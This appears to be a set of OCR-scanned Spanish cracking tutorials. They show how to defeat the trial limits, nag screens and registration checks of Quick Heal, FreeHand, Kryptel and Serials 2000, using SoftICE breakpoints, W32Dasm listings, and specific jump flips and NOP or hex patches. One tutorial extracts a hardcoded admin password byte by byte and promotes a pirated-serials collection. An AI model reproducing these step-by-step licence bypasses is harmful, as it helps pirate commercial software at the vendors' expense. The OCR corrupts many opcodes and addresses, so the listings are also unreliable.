con otro,bpx DialogboxparamaA, y bingo!!!.F12 y estamos en el interior 

de nuestra victima.Anotamos la direccion del call dialogboxparama,para 
referencia en el w32dasm. 

PD: El softice se necesita en este caso para referencia pues no sabemos cual de 
todas las funciones genera la nag y no 

perdernos en el listado muerto. 

Buscamos esta direccion en el w32dasm y vemos esto: 


:0042C6D5 8B542408 mov edx, dword ptr [esp+08] 
:0042C6D9 50 push €2axX--------=..........-- >nop 
:0042C6DA A188154600 mov eax, dword ptr [00461588] 
:0042C6DF 6880C44200 push 0042C480 

:0042C6E4 52 push edx---------- >nop 


* Possible Reference to Dialog: DialoglID_0092 


:0042C6E5 6892000000 push 00000092.------ >nop 


:0042C6EA 50 push eax------ >nop 


* Reference To: USER32.DialogBoxParamA, Ord:0093h 


:0042C6EB FF15F4124400 Call dword ptr [004412F4]---->nop ''Aqui 
aparecemos"' 

:0042C6F1 SE pop esi 

:0042C6F2 C20400 ret 0004 


Ahora solo nos resta deshacer el call y todos los push inmediatamente por encima 
de este(5 push). 

Ahora tenemos un supuesto ''Full registered version" del programa.,sin ningun 
indicio q' nos diga lo contrario. 


| FEELFREE-KOLGADO 
Karpoff Spanis 
Tutorial Descargado de o 


Crackeando Quick Heal 


La victima: Quick Heal 

URL: www.quickheal.com 

Descripcion: Excelente virus scanner 

Dificultad: Principiante 

Objetivo: Simular estar registrado 

Cracker: Kolgado 

Ponemos un numero cualquiera,control-d y nos salta el softice,bpx getdlgitemtexta 

pa' probar y x, volvemos al programa,le damos ok y nos salta de nuevo el soft,un f12 y estamos en la 
rutina del programa,a partir de ahi podemos seguir dos caminos, 

analizar minuciosamente y ver como se comporta el codigo(útil si queremos un KeyGen.),o probamos 
darle fanaticamente f10 hasta que nos aparezca el mensaje de "error en el codigo" o algo por el estilo. 
Para no complicarnos demasiado(y porque tambien soy bastante nuevo para un keygen),probemos nuestra 
suerte con la segunda opcion. 

Le damos f10 19 veces, y a la 20 nos aparece la ventana "incorrect unlock code",le damos aceptar y 
aparecemos en: 


:00408D27 6880134400 push 00441380 


* Possible StringData Ref from Data Obj ->"Incorrect unlock code." 


:00408D2C 6818244400 push 00442418 
:00408D31 E824D30100 call 00426054 


* Possible Reference to Dialog: DialoglID_0066, CONTROL_ID:0458, "" 


:00408D36 6858040000 push 00000458 "AQUI APARECEMOS" 


:00408D3B 8BCE mov ecx, esl 


:00408D3D E8C7580100 call 0041E609 
:00408D42 85C0 test eax, eax 
:00408D44 7504 jne 00408D4A 
:00408D46 33C0 Xor eax, eax 
:00408D48 EB03 jmp 00408D4D 


El call inmediatamente arriba de donde aparecimos fue el que provocó el mensaje, por lo tanto, 
busquemos un poco arriba para ver q' tenemos(hay q! buscar algun salto condicional). 


:00408CBO 50 push eax 

:00408CB 1 51 push ecx 

:00408CB2 ES6ECDFFFF call 00405A25 
:00408CB7 83C408 add esp, 00000008 
:00408CBA 83F801 cmp eax, 00000001 
:00408CBD 7564 jne 00408D23 "LA CLAVE" 
:00408CBF E833CEFFFF call 00405AF7 
:00408CC4 E8438EFFFF call 00401B0C 
:00408CC9 663D0200 emp ax, 0002 
:00408CCD 7549 jne 00408D18 
:00408CCF FF761C push [esi+1C] 


No necesitamos ir muy lejos y nos encontramos un ¡nz 00408d18 y un poco mas arriba jnz 
00408d23,ahora bien, esto no nos dice nada por si solo, 

asi que analicemos un poco.Si nos fijamos en j¡nz 00408d23(en w32dasm jne) nos damos cuenta de que en 
caso de hacer el salto apareceriamos unas cuantas 

instrucciones antes de nuestro famoso call q' produce el mensaje de error,exactamente en: 


:00408D21 EB31 jmp 00408D54 
:00408D23 6A30 push 00000030 "AQUI" 
:00408D25 8BCE mov ecx, esi 


* Possible StringData Ref from Data Obj ->"Error" 


:00408D27 6880134400 push 00441380 


* Possible StringData Ref from Data Obj ->"Incorrect unlock code." 


:00408D2C 6818244400 push 00442418 
:00408D31 E824D30100 call 0042605A "NUESTRO MARTIRIO" 


Tambien podemos notar que inmediatamente arriba de push 30 esta un ¡mp que evitaria pasar por el call 
"de los lamentos". 

por lo que a simple vista pareceria ser que nuestro 00408cbd jnz 00408d23 seria lo q' distingue de estar o 
no registrados.Pero antes de sacar conclusiones a la ligera, probemos. 

Ponemos un bc*, y luego un bpx en 00408cbd,le damos control-d,le damos ok de nuevo a nuestra ventana 
de Registro y nos baramos en el bpx que hemos puesto. 

Vemos que realmente va a saltar,como suponiamos,asi q' probemos,total no perdemos nada (creo).En le 
softice le damos r fl z y se convierte "magicamente" en un "no jump”. 

Ok el momento de la verdad,le damos bc*, y luego x, y pam!!!, un lindo mensaje... "Quick Heal has been 
upgrade to a complete..."No sweat.Ni siquiera necesitamos parcharlo,solo un cambio en un salto en tiempo 
de ejecucion y listo. 

Esperando que les sirva de ayuda.Atte. Kolgado. 

PD:Esta es la manera mas facil y es genial para los nuevos,si se animan le pueden dar con el 
keygen.Gracia a todos en el spanish reverse... 

FreeMind. 


FreeHand $.0.1 


| Plataformas WO95 


Descripción ¡Editor de imagenes,texto,dibujo,etc. | 


Tipo 'Trial de 30 dias 


Url | Ihttp://www.macromedia.com 


Protección Limite de 30 Dias 

Dificultad ¡Amateur 

Herramientas [Softlce v4.01, W32dasm v8.9, UltraEdit v6.20a 
Objetivo ¡Romper el limite de 30 dias 

Cracker KOLGADO 


Fecha 21/22 de Octubre de 1999 


Al Atake: 


Para empezar adelantamos la fecha unos 35 dias,corremos el programa y nos sale 
la nag con dos botones,el try(deshabilitado) y el exit.Le damos exit y volvemos la 
fecha a la actual, corremos de nuevo el programa y nos sale una ventana chiquita 
que nos dice que Warning quisimos hacer trampa,bla,bla,bla... o sea que hay algo 
que le avisa al programa que el trial expiro, y por mas que alteremos la fecha 
sigue expirado.OKk, softice time, ponemos un bpx enablewindow, F12 una vez, y 
estamos adentro y vemos una llamada al user32!'DialogboxparamaA (aqui se 
genera la ventana del Warning),asi que vamos a poner un nop en este call y en los 
push inmediatamente superiores.Anotamos la direccion y vemos el offset con el 
w32dsm: 


:0040828C 8815628D4300 mov byte ptr [00438D62], dl 
:00408292 6A00 push 00000000 

:00408294 68B06D4000 push 00406DB0 

:00408299 6A00 push 00000000 


* Possible Reference to Dialog: DialogID_0072 


:0040829B 6A72 push 00000072 
:0040829D 50 push eax 


* Reference To: USER32.DialogBoxParamA, Ord:008Eh 
| 


:0040829E FF1588954400 Call dword ptr [00449588]-------- >aparecemos aca 
:004082A4 83F806 cmp eax, 00000006 

:004082A7 0F34EA000000 je 00408397 

:004082AD E9CC000000 jmp 0040837E 


En el hex cambiamos desde el offset 00007692 hasta 000076434 por 90, y luego 
salvamos los cambios, corremos el programa y chau,chau ventana, y ademas nos 
habilita el programa tambien!!!;.., o sea que ahora hemos tenido una mejora, si 
nos pasamos del trial, retrocedemos la fecha del sistema y nos va a habilitar igual, 
en este punto si sos caigije(expresion usada en mi pais que equivale a no querer 
hacer nada), te puedes conformar con esto que es lo minimo, o si te gusta 
experimentar con lo desconocido, seguí (elegi esto ultimo):) 

Nos vamos al "futuro' de nuevo y ahi esta otra vez esa nag,bueno, vamos a ver 
que nos dice la ''autopsia”,,,,en el w32dsm,buscamos el string expired: 


:00405FDD 891D9C654300 mov dword ptr [0043659C], ebx 
:00405FE3 755C jne 00406041 

:00405FES 3935800E4400 cmp dword ptr [00440E80], esi 
:00405FEB 741A je 00406007 

:00405FED A120BB4300 mov eax, dword ptr [0043BB20] 
:00405FF2 50 push eax 


* Possible StringData Ref from Data Obj ->"%s Expired" 


| 

:00405FF3 6800C44200 push 0042C400--ooooo====- > aqui 
5:00405FF8 6840794300 push 004379A0 

:00405FFD ESBE9A0100 call 0041FACO 

:00406002 83C40C add esp, 0000000C 

:00406005 EB4C jmp 00406053 


Los dos saltos inmediatamente superiores son tentadores pero creo que no pasa 
nada con ellos (al menos para mi) los analice y no vale la pena entrar en detalles. 
Bue..:) 55 instrucciones mas arriba esta una instruccion interesante : 


:00405F2B 8B442410 mov eax, dword ptr [esp+10] 

:00405F2F 83C0FE add eax, FFFFFFFE 

:00405F32 83F8S1E cmp eax, 0000001 E<---------=========- cambiar 83f81e por 83£800 
:00405F35 0F8794020000 ja 004061 CE<ooooccccccccoccccnmnnnmn 

:00405F3B 33C9 xor ecx, ecx 

:00405F3D 8A88F4614000 mov cl, byte ptr [eax+004061F4] 

:00405F43 FF248DE0614000 ¡mp dword ptr [4*ecx+004061E0] 

:00405F4A A1ECCE4300 mov eax, dword ptr [0043CEEC] 


Vemos una comparacion de el valor de eax con 1e<30 en decimal> podria ser por 
los 30 dias del trial .Ponemos un bpx en la direccion del ja para ver que onda, y 
notamos que no va a saltar y como nuestra trial esta expirado tenemos que 
invertir < a la mas pura Ingenieria Inversa> 

para estar bien. 

El valor de eax en esa comparacion si no recuerd9o mal es 6 y tiene que ser major 
a 30 para que salte,para esto facilmente podemos cambiar el 1le por 00 y siempre 
saltara ,,pero antes de eso vamos a ver si estamos en lo cierto. 

Como es un ja las flag c y z deben estar en cero para ocasionar el salto , hacemos 
que salte y le damos x y enter y ¡¡¡pam!!! el invitado se ha presentado:) muy bien.,,, 
ahora que estamos seguros vamos a hacer el cambio definitivo. 

Abrimos nuestro hex y hacemos los cambios (creo que no es necesario explicar 
comom parchar con el hex pues ya ha sido explicado en otros 
tutoriales),,,corremos el programa,,,Oh no algo pasa, el famoso mensaje de 
windoze de volcado de pila,pero no nos desesperemos,,,por la pinta lo mas 
probable es que al alterar el codigo hace un rato, provoco otro cambio en algun 
lugar del exe.Para ver donde el error, en la ventanita que nos aparece le damos 
click en detalles y nos proporciona la direccion donde se produjo el "error 
fatal".La direccion es 0040512 ponemos en el soft un bpx en dicha direccion y : 


:00405127 6A 04 push 00000004 

:00405129 ES92A 80100 call 0041F9C0 

:0040512E OFAFC7 imul eax, edi--------- >cambiar Ofafc7 por 909090 

:00405131 OFAFC6 imul eax, esi---------- >cambiar Ofafc6 por 909090 

:00405134 830404 add esp, 00000004 

:00405137 85CO0 test eax, eax 

:00405139 C70064000000 mov dword ptr [eax], 00000064------- > Aqui aparecemos 
:0040513F 7409 je 0040514A 


Vemos que eax tiene un valor de 00000000, ahora volvamos al editor hex y 
cambiemos el le por 00 de hace un rato a como estaba antes es decir 00 por 
1e,corremos de nuevo el programa y nos debe parar el soft , ahora bien, notas la 
diferencia que provoco el error???, el valor de eax ahora es 00cc05b0.Cinco 
instrucciones mas arriba hay un call vamos a poner un nuevo bpx en esa 
instruccion para ver con que valor sale eax. 

Oli pum!! pantallazo y estamos en el soft le damos F10 y nos vamos a la 
primera multiplicacion imul eax, edi, vemos que el valor de eax es 00ccO5b0(el 
numero que evitaria generar el error) o sea que al salir del call el valor de eax es el 
correcto pero se vuelve cero por culpa de las multiplicaciones,probablemente sea 
una comprobacion o algo asi,no le entiendo el significado ,lo que si se es que si 
evitamos las multiplicaciones el valor de eax=00cc05b0 que es lo q' queremos. 
En el cuadro de instrucciones estan los detalles que hay que cambiar en el hex y 


ademas cambiamos el ya famoso 1e por 00 de nuevo para probar si anda el 
parche. 

Corremos el programa ...... y el maldito error otra vez:(... vamos a ver si es en la 
misma direccion,, vemos en detalles y es en otra direccion:004025de,vamos en un 
flash a €Sa.......... 

Mmmmmmz.... un momento,...... Si!!!! es la misma rutina que el error anterior esta 
la asignacion a eax de 64,mas arriba las dos multiplicaciones y el call,por lo tanto 
repitamos el proceso anterior, las dos imul por nop, ok ,vamos a probar, 


PD: Espero que a alguien le sirva este texto, me parece que esta muy improvizado 
pero me costo un monton. 
Hasta la proxima. 


FeelFree... 


Karpoff Spanis 
Tutorial Descargado de o 
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INTRODUCCION 


Hola que tal, esta es la primera vez que me decido a hacer un tutorial. 
La verdad es que soy un taco de vago para escribir, pero los 
conocimientos hay que compartirlos sino se te pudren en la cabeza, como 
bien dijo alguien por ahí ;)) 


Bueno, este programa es un encriptador/desencriptador, yo ni siquiera 
se usarlo (tampoco me he puesto) pero es uno de otros tantos programas 
que 


mi colega Killman se entretiene en buscarme pa que yo lo destripe y 
aprenda un poquito mas ;) (Grasia Gitano :P) 


Se trata de una proteccion Cinderella de 30 dias, con una Nag de 
entrada avisandote de los dias que faltan para el fatidico petado de 
programa y una Nag despues de introducir los datos de registro, 
avisandote de que los datos introducidos se comprobaran la proxima vez 
que lo ejecutes y tal 


Bueno, empecemos: 


Para empezar hay que instalarlo, ejecutamos Kryptel.exe y lo instalamos 
obteniendo brw.exe. 


Ejecutamos bre.exe y antes de comenzar ya aparece la primera Nag 
avisandonosde que tenemos 30 dias para registrarlo. Bien, le damos a 
continuar y entramos en el programa. Nos vamos a la ventana de registro 
Help/Registration Code y probamos un nombre y serie aleatorio. Yo he 
puesto Spud y 123456. Pulsamos en registrar y nos da un mensage 
avisandonos de que el numero de serie tiene un formato erroneo, el cual 
debe ser tal que asi XXXX-XXXX-XXXXXXXX. Po guay, trabajo que nos 
ahorra el programador para cuando tengamos que sacar un numero de serie 
valido ;) 


Ok, seguimos. Ponemos de nuevo Spud y este serial 1234-5678-12345678 y 


le damos a registrar, ahora nos aparece una ventanita dandonos las 
gracias por registrar el producto y bla bla bla que el codigo de 
registro que has introducido se comprobara cuando reinicies el programa 
y que sabras si es correcto o no cuando aparezca tu nombre (Spud) en la 
ventana de About. Vale, reiniciamos el programa, vamos a about y como 
es natural seguimos sin estar registrados. 


Muy bien, ya hemos tanteado el programa, ya sabemos que el codigo 
introducido o bien se guarda en algun lugar del ordenador o bien el 
codigo se procesa, se comprueba el serial y se guarda un flag de 
"Registro aceptado" en ese lugar del ordenador. En cualquiera de los 
dos casos ese lugar puede ser el registro de sistema, el propio 
ejecutable o algun archivo de inicializacion. Lo mas usual siempre es 
el registro de sistema asi que me voy al W32Dasm y busco en las 
Imported Functions alguna funcion referente al registro de sistema de 
entre todas encuentro 


GetPrivateProfileStringA y 


SetPrivateProfilesStringA 


Vale, estas funciones lo que hacen simplemente es introducir en un 
directorio del registro de sistema una Cadena de caracteres. Una vez 
cerrado y abierto el programa por primera vez puedes irte al registro 
de sistema y buscar por ejemplo la cadena "Kryptel" hasta que 
encuentres la zona de nuestro programa. El buscador del registro de 
sistema se para un par de veces, miramos y no encontramos nada que nos 
interese, la tercera vez que se para lo hace en 

"HKEY_ LOCAL MACHINEASoftwarexINV softworks1Kryptel" miramos dentro y 
podemos ver que se encuentran almacenados en forma de Cadena de texto 
nuestro serial y nuestro nombre. Esto quiere decir que los datos 
introducidos en la ventana de registro se almacenan en el registro de 
sistema y son recuperados luego por el programa cuando se ejecuta de 
nuevo, para procesarlos y decidir si el programa se registra o no. 


Llegado a este punto comence a poner breackpoints del tipo BPX 
WritePrivateProfileStringA IF *(*(ESP+4))= =“RegC” y BPX 
GetPrivateProfileStringA IF *(* (ESP+4))= =“RegC” (la metodologia de 
estos Breackpoints la podeis comprender en el tutorial de "Crack en 
colores de E+P") para interrumpir el programa en los accesos de 
lectura/escritura del registro de sistema con respecto a nuestro 
serial. Podria explicaros mas a fondo en que consiste esto, pero la 
verdad es que llegado a este punto la cosa se me empezo a complicar, y 
decidi cambiar de estrategia. 


(Si tienes tiempo y mas experiencia que yo quizas te interese continuar 


7) 
Otra estrategia 


Como lo de seguir el calculo del serial no me fue muy bien, decidi ir a 
por la proteccion temporal, asi que busque en el W32Dasm algunas 
funciones de acceso al reloj del sistema y me tope con las siguientes: 


GetSystemTimeAsFileTime, GetTickCount y GetTimeFormat 


GetTickCount cuenta los milisegunos pasados desde que se inicio 
Windows, GetTimeFormat formatea una zona de memoria para ser usada por 
una variable de tiempo y GetSystemTimeAsFileTime, que es la que nos 
interesa, obtiene la fecha y hora actual en el formato de Tiempo 
Coordinado Universal (ke koño significara esto XD) la funcion se 
declara asi: 


VOID GetSystemTimeAsFileTime ( 


LPFILETIME l1pSystemTimeAsFileTime // Puntero a una estructura de 
archivo de tiempo 


); 


Estructuta de archivo de tiempo: 


typedef struct _FILETIME ( 


DWORD dwLowDateTime; 


DWORD dwHighDateTime; 


) FILETIME; 


En resumen el primer parametro que se le pasa a la funcion 
GetSystemTimeAsFileTime es un puntero hacia una estructura de 8 byes 
(doble DWORD) en la que se encuentra codificada la fecha y la hora 
actual. 


Asi pues entramos en accion abriendo el Softlce (CTRL+D) y poniendo un 
BPX GetSystemTimeAsFileTime. Luego ejecutamos el Kryptel y caemos 
dentro de la funcion. Pulsamos F12 y entramos en el KERNEL, pulsamos 
otra vez y seguimos en el KERNEL asi que F5 para continuar, la segunda 
vez ocurre lo mismo y es que se trata de dos comprobaciones iniciales 
de la fecha para algo relacionado con la carga del fichero para la 


ejecucion. La tercera vez que el Sice corta en esta funcion pulsamos 
F12 y aparecemos en el codigo del kryptel (BRW.EXE) Justamente aquí: 


:00403A2E 68901A4100 push 00411A90 KA Puntero al FILETIME 


* Reference To: KERNEL32.GetSystemTimeAsFileTime, Ord:0137h 


:00403A33 FF1510364100 Call dword ptr [00413610] 


:00403A39 3935081C4100 cmp dword ptr [00411C08], esi 


echamos un vistazo a la direccion 411A90 y vemos los 8 bytes del 
filetime 


:d 411A90 


167:411A90 60 83 04 D9 99 20 BF 01 por supuesto en tu ordenador sera 
diferente. 


Bueno, ponemos un BPR 167:411A90 167:411A90+7 RW para que el Sice pare 
cada vez que se lee o escribe en esa zona de la memoria. Pulsamos F5 y 
se para en 403EF8: 


:00403ECF FF15C8384100 Call dword ptr [004138C8] 


:00403ED5 A1AC124100 mov eax, dword ptr [004112AC] 


:00403EDA 3905A8124100 cmp dword ptr [004112*8], eax 


:00403EE0 7510 jne 00403EF2 


:00403EE2 85C0 test eax, eax 


:00403EE4 750€ jne 00403EF2 


:00403EE6 C605C423410001 mov byte ptr [004123C4], 01 


:00403EED E981000000 jmp 00403F73 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 


| :00403EE0 (C), :00403EE4(C) 


:00403EF2 8BO0ODAC1A4100 mov ecx, dword ptr [00411AAC] f Fecha limite 


:00403EF8 8B15941A4100 mov edx, dword ptr [00411A94] f Fecha actual 5 
AQUÍ PARA EL SICE 


:00403EFE 3BCA cmp ecx, edx K Se comparan 

:00403F00 7F6A Jg 00403F6C f Salta si se supera la fecha limite 
:00403F02 A1lA81A4100 mov eax, dword ptr [00411AA8] 

:00403F07 7C08 31 00403F11 f Salta si fecha actual < limite 
:00403F09 3B05901A4100 cmp eax, dword ptr [00411A90] 

:00403F0F 775B Ja 00403F6C f Salta si se supera la hora limite 

* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :00403F07 (C) 


:00403F11 8B1D901A4100 mov ebx, dword ptr [00411A90] f Si fecha actual 
< fecha limite continua el programa. 


Como podeis ver hemos acodizado justo en la rutina de comparacion de 
fechas, lo primero que hace es Cargar en ECX los 4 segundos bytes del 
FILETIME que contiene la fecha limite, estos 4 ultimos bytes contienen 
el Dia/Mes/Año, y se comparan con los 4 ultimos del FILETIME de la 
fecha actual. Si se ha superado la fecha limite el programa salta a 
403F6C y la verdad es que no se que es lo que hace entonces, no ocurre 
nada! Algo habra tramado el programador porque si adelantas la fecha a 
31 dias despues de la fecha de instalacion no ocurre nada de nada, es 
mas, el nag de entrada desaparece. Como comienzo se puede cambiar en 
403F00 el JG 00403F6C por un JMP 403F6C dejara de salir el nag de 
comienzo y sea cual sea la fecha siempre evitara la nag, con esto 
supuestamente se consigue que el programa nunca Ccaduque. Sin embargo, 
como no me fiaba mucho de esto segui indagando un poquillo y retrocedi 
un poco hacia atrás. 


Este trozo de rutina que hemos analizado es llamado desde 403EE0 y 
403EE4, veamos esto: 


:00403ECF FF15C8384100 Call dword ptr [004138C8] 
:00403ED5 A1AC124100 mov eax, dword ptr [004112AC] 
:00403EDA 3905A8124100 cmp dword ptr [004112A8], eax 
:00403EE0 7510 jne 00403EF2 

:00403EE2 85C0 test eax, eax 

:00403EE4 750C jne 00403EF2 

:00403EE6 C605C423410001 mov byte ptr [004123C4], 01 


:00403EED E981000000 3jmp 00403F73 


Aquí tenemos claros los dos saltos condicionales en 403EE0 y 403EE4 JNE 
403EF2 que saltan hacia la rutina de comprobacion de la fecha, para que 
estos saltos no se realicen es necesatio que tanto lo que hay en la 
direccion 4112AC como lo que hay en la direccion 4112A8 sean 0. Si 
pones BPMD en esas dos direcciones y te pones a averiguar de donde 
salen te puedes kedar un poco pillao, asi que lo mejor es NOPear estos 
dos saltos y evitar siempre el calculo de la fecha. Dejamos correr el 
programa y vemos que el NAG no sale, la fecha no se comprueba y si nos 
vamos al menu de About vemos como el reiterado mensage de Unregistered 
evaluation copy es sustituido por nuestro nombre ;) 


Bueno, espero que os haya gustado mi primer tutorial, y que os haya 
servido de algo ;) si teneis alguna duda mi mail es 
i15780fgalileo.fie.us.es y como dice la peña esta del Wkt buscar al +0RC 
en la red. 


Karpoff Spanis 
Tutorial Descargado de o 


Fecha 18 de Enero 2000 
Cracker XASX 
App Serials 2000 v6.0 
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Appz URL 


Protección Administration Tools Password Requerida 


Para el password solo Softl ce v4.x... y para jugar con el código W32DSM y un Editor 


Herramientas : 
Hexadecimal. 


Introducción 


Hola a todos, este es un tutorial básico dedicado/ escrito para newbies. 
Intentaré explicar todo lo que pueda dando notas y conceptos interesantes. 


Espero que leyendo este tutorial aprendas y mejores tus cualidaded como cracker y aprendas algunos conceptos 
básicos. 

Esto no es un tutorial de 'cambia 74 a EB con el editor y mira como funciona', seguramente al acabar de leer esto 
(si eres un newbie) tengas algo nuevo en la cabeza :). 


La victima es el conocido Serials 2000 v6.0, una bonita recopilación de serials con una engine de busqueda muy 
buena... actualmente es la mayor lista disponible. 


Consiguelo (si es que no lo tienes ya), este programa hay que tenerlo, además asi podrás aplicar y practicar más 
facilmente con este tutorial. 


Ok, vamos a ver que protección tiene este programilla. 
Por cierto, mirad que conversación más interesante con el creador del Serials2000 :) 


<[Xasx]> ¡ get it in 2 min. 

<[Xasx]> or less 

<ThndrKiss> how? 

<ThndrKiss> the coder wants to know 

<[Xasx]> :) 

<ThndrKiss> because he put a anti-cracking routines in 
<[Xasx]> im cracker... 

<[Xasx]> of TNT 

<ThndrKiss> ¡ know 

<ThndrKiss> but was it easy?? 


Bueno, pues aquí va toda la desprotección para que veaís lo fácil que es saltarse unas cuantas 'anti-cracking 
routines' de esas que los programadores creen que han metido, pero realmente nosotros ni las veremos. 


Xasx / TNT! 
Cracking 
Serials 2k tiene una opción en el File Menu: Administration Tools que pide un PASSWORD. 


El sistema de protección del S2k es muy fácil de crackear, yo conseguí el password al minuto de ponerme a 
crackearle... cualquier cracker con mínimo nivel puede crackearle en un momento también. 


Solamente utilizaremos una herramienta para conseguir el password... como no, Softl ce (v3.x O 4.x). 


Asumo que tienes instalado y configurado correctamente el Softl ce, y que sabes como hacer cosas básicas como 
poner un breakpoint y todo eso. 


Si no sabes nada de usar Softl ce o ni si quiera le tienes instalado, primero leete un tutorial sobre como hacerle 
funcionar y luego vuelve aqui :). 


Bueno, entonces tenemos Softl ce listo y el Serials 2k esperando ser crackeado. 


El primer paso es ver que tenemos... 
Una ventana que pide un password y los botones de Ok o Cancelar. 


Si ponemos un password inválido, nos saldrá una messagebox que dice '| ncorrect Password. 


Ok, todo normal... ahora nuesto 'amado' Softl ce deberá trabajar un poco; necesitamos saber que hace el 
programa cuando pulsamos el boton OK. 


Para hacer esto tenemos que poner un breakpoint en el Softl ce, la mejor elección es 'romper' la aplicación cuando 
coge el password que hemos metido. Tenemos varios breakpoints (BPX) posibles para hacer esto, los más 
utilizados son: 


e GetDlgltemTextA 
e GetWindowTextA 


Como inicialmente no sabemos cual va a funcionar, pondremos los dos en el softice a ver q pasa. 


Abre el Softl ce (CTRL+D) 
bpx getdlgitemtexta 
bpx getwindowtexta 


Notas sobre los breakpoint: 


para listar todos los BPXs en Softl ce, escribe bl. (BreakPoint List) 

para borrar todos los BPXs en Softl ce, escribe be*. (BreakPoint Clear *= Remove All Set BreakPoints) 

para desactivar todos BPXs en Softl ce, escribe bd*. (BreakPoint Disable *= Disable All Set BreakPoints) 

para activar todos los BPXs en Softlce, escribe be*. (BreakPoint Enabler *= Enable All Set BreakPoints) 

* puede ser cambiado por el número de breakpoint que queramos para activar/desactivar/borrarle. Ejemplos: bel | bd2 | 
bel,2 | bc1,2 


Esto hará al Softl ce 'saltar' cuando la aplicación coja nuestro password. 
Ok, vamos a probar si funciona... introduce un password... por ejemplo: crackisfun y entonces pulsa OK. 


jejeje, bienvenido a Softl ce :), ahora mismo estamos un paso después de que se haya cogido el password con la 
llamada getwindowtexta. 


Lo primero de todo, miramos en la barra verde esa de abajo del softice... estamos situados en código del USER32!. 
Esto no es dónde queremos llegar pq no es el Serials 2k exe. Para llegar a nuestro objetivo tenemos que ir 
saliendo de estas llamadas (calls). 


Pulsa F11 (para salir de la call) una vez para volver de la llamada actual, ok, ahora estamos en código del MFC42!. 
Esta es una DLL que usa el programa para funcionar. 

Podemos ver la instrucción RET (Return)... pulsa F1O (ejecutar la siguiente instrucción) varias veces para dejar 
esta Call, después pulsa F1O y cuando pasamos el último RET ya nos situamos en código del Serials2k.... 

Bueno, solo hay dos instrucciones y después otro RET... pulsa otra vez F1O para salir de esta llamada... otra vez 
en código del MFC42!... pulsa F1O varias veces hasta llegar al RET y salir de esta llamada. 


Por Fin!, ya estamos en código del Serials2k!... hmm y parece interesante :) 
Nota: para moverte en la ventana de código debes usar CTRL+up o CTRL+down. 


Podemos ver este código: 


:00403445 EB8AECFOOOO Call 004103F8 

:0040344A 8B86E4000000 mov eax, dword ptr [esi+000000E4] | Aquí aparecemos 
:00403450 8378F808 cmp dword ptr [eax-08], 00000008 
:00403454 7536 jne 0040348C 

:00403456 803868 cmp byte ptr [eax], 68 
:00403459 7531 jne 0040348C 

:0040345B 80780161 cmp byte ptr [eax+01], 61 
:0040345F 752B jne 0040348C 

:00403461 80780263 cmp byte ptr [eax+02], 63 
:00403465 7525 jne 0040348C 

:00403467 8078036B cmp byte ptr [eax+03], 6B 
:0040346B 751F jne 0040348C 

:0040346D 80780474 cmp byte ptr [eax+04], 74 
:00403471 “7519 jne 0040348C 

:00403473 80780568 cmp byte ptr [eax+05]1, 68 
:00403477 7513 jne 0040348C 

:00403479 80780669 cmp byte ptr [eax+06], 69 
:0040347D “750D jne 0040348C 

:0040347F 80780773 cmp byte ptr [eax+07], 73 
:00403483 7507 jne 0040348C 

:00403485 C7466001000000 mov [esi+60], 00000001 
:0040348C 8BCE mov ecx, esi 

:0040348E E8D9CDO000 Cal1 0041026C 

:00403493 5E pop esi 

:00403494 C3 ret 


Analisis del código paso por paso: 

Nota: para avanzar a la siguiente instrucción en el Softl ce, se usa FLO. 

He dividido el código en 2 grupos... el primero es este: 

Bueno, empezamos en el offset 0O40344A. Como podemos ver el registro DS contiene un número... si el password 
que metimos fue 'crackisfun', entonces, el númbero es 009. hmm nuestro password tiene 9 caractéres... pulsa F1O 


para avanzar a la siguiente instrucción 


La siguiente instrucción es: 


:0040344A 8B86E4000000 mov eax, dword ptr [esi+000000E4] | Inicio, ve longitud de nuestro 
passw 

:00403450 8378F808 cmp dword ptr [eax-08], 00000008 | Comparacion longitud Password 
:00403454 7536 jne 0040348C | Salta si nuestra longitud del password no es 8 
¿QUUOTARIA sia res (segundo grupo) ...... 

:0040348C 8BCE mov ecx, esi | el offset donde salta... 


:0040348E E8D9CD0O000 
:00403493 5E 
:00403494 C3 


Cal1 0041026c | llamada no importante 
pop esi | pone O al registro esi 
ret | vuelve de la llamada... adios 


La segunda instrucción hace una comparación: (( dword ptr [eax-08] )) con (( 8 )). 


Hecha un vistazo al registro EAX... pon: db eax en Softl ce para localizar en la ventana de datos Datos de 
Registro EAX, ohhh!!!, estamos viendo nuestro pasword!... entonces s2k esta comparando “el número de 
caracteres de nuestro password" con “8”... 


después de la comparación hay una instrucción J NE (Salta si no es igual). 
Todo esta realmente claro: 


si “el número de caracteres de nuestro password' no es igual a '8'... la siguiente instruccion dará el salto al offset 
designado. 

si “el número de caracteres de nuestro password' es igual a '8' la siguiente instrucción no hara el salto 
condicional y continuaremos en la siguiente instrucción. 


hmm, nuestra contraseña tiene 9 caractéres... 
Entonces la instrucción J NE saltará... si, lo hace. 


Intenta poner una password de 8 caractéres en el s2k, por ejemplo: 'tntpower' y vuelve a este código de nuevo... 
hmm no salta ahora :) 


Bueno, ya sabemos que el password correcto tiene 8 caractéres. 


Segundo 'grupo' de Instrucciones... 


:00403456 803868 cmp byte ptr [eax], 68 
:00403459 7531 jne 0040348C 

:0040345B 80780161 cmp byte ptr [eax+01], 61 
:0040345F 752B jne 0040348C 

:00403461 80780263 cmp byte ptr [eax+02], 63 
:00403465 7525 jne 0040348C 

:00403467 8078036B cmp byte ptr [eax+03], 6B 
:0040346B 751F jne 0040348C 

:0040346D 80780474 cmp byte ptr [eax+04], 74 
:00403471 “7519 jne 0040348C 

:00403473 80780568 cmp byte ptr [eax+05], 68 
:00403477 7513 jne 0040348C 

:00403479 80780669 cmp byte ptr [eax+06], 69 
:0040347D “750D jne 0040348C 

:0040347F 80780773 cmp byte ptr [eax+07], 73 
:00403483 7507 jne 0040348C 

:00403485 C7466001000000 mov [esi+60], 00000001 
:0040348C 8BCE mov ecx, esi 

:0040348E E8D9CDO000 Cal1 0041026C 

:00403493 5E pop esi 

:00403494 C3 ret 


Vamos a analizar estas instrucciones... es fácil de ver... 8 comparaciones y 8 instrucciones J NE 'salta si no es igual". 
Recuerda que en el registro EAX esta situado nuestro password, si estamos aquí es porque nuestro password tiene 
8 Caractéres, y ahora hay 8 comparaciones :)... no necesitas pensar demasiado para ver lo que va a ocurrir aquí. 


Exacto, cada caracter de la contraseña será comparado con algo y si no es igual alguno de ellos pues saltara al 
offset designado. 


La primera comparación es: (( byte ptr [eax] )) con (( 68 )) 


